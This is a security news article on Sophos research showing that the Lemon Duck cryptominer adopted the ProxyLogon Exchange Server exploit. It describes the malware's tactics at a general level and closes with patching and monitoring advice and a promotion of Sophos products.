On 2 March 2021, Microsoft released security patches for multiple zero-day vulnerabilities that were being used to attack on-premises versions of Microsoft Exchange Server. The bugs are known collectively as ProxyLogon.
An exploit for ProxyLogon appeared almost immediately. Some reports suggest that the code for the exploit was leaked accidentally or deliberately after researchers created a proof-of-concept exploit for security research.
Regardless of its origins, the exploit remains freely accessible and adversaries, including operators of ransomware, cryptominers and information stealers have been quick to seize the chance to use it in attacks targeting unpatched Exchange servers.
The Lemon Duck malware
Sophos recently discovered that the advanced crypto-miner malware, Lemon Duck, had added the ProxyLogon exploit to one of its updates. According to Sophos senior threat researcher, Rajesh Nataraj, this updated version was being used to target unpatched Microsoft Exchange servers alongside a range of features that, between them, allow the malware to establish a ‘firm foothold' in a compromised server, while evading detection by defenders.
Attacks using the ProxyLogon exploit involve the injection of web shells onto an infected server. These web shells are attacker files that are added to a web server's directory and enable the attacker to issue new instructions, for instance to execute a file at any time simply by requesting it from the web server.
“Web shells are pernicious. They provide attackers with a permanent backdoor into a victim's web applications and related systems, with the ability to add commands of their choice, whenever they want to, direct onto the web server, without needing to login first,” says Nataraj.
“This version of Lemon Duck allows an attacker to copy the web shells they use and hide them in a different location – boosting the likelihood of the shells remaining unseen so they can be used again.”
However, this isn't the only hallmark of a ProxyLogon-enabled Lemon Duck attack. Others include:
- The installation of the miner payload as a Windows service to establish persistence
- Use of an Oracle WebLogic server exploit used to attempt to move laterally to other servers on the network
- In some cases, the use of certutil.exe to download the Lemon Duck payload, which is launched using PowerShell
- The creation of a user account with remote desktop access
- Updates to Lemon Duck's defence evasion code, which attempt to disable and remove even more security products.
What defenders can do
In the light of Sophos' research, Nataraj recommends defenders take urgent steps to install Microsoft's patches to prevent exploitation of their Exchange Server.
But, he adds, patching is not enough on its own.
“Organisations need to determine and address their wider exposure so they don't remain vulnerable to later attacks,” he says.
“For instance, admins should scan the Exchange server for web shells and monitor servers for any unusual processes that appear seemingly out of nowhere.
“High processor usage by an unfamiliar program could be a sign of cryptomining activity or ransomware. If this isn't possible, closely monitor the server until you migrate the Exchange data to an updated server then disconnect the unpatched server from the internet.”
Organisations should also seek the best possible solutions aimed at protecting against these attacks. Sophos Intercept X and Sophos Intercept X with EDR protect against threats attempting to exploit the ProxyLogon Exchange vulnerabilities.
Learn more about the Sophos analysis of cryptominers and other threats targeting ProxyLogon vulnerabilities, detection and indicators of compromise at SophosLabs Uncut.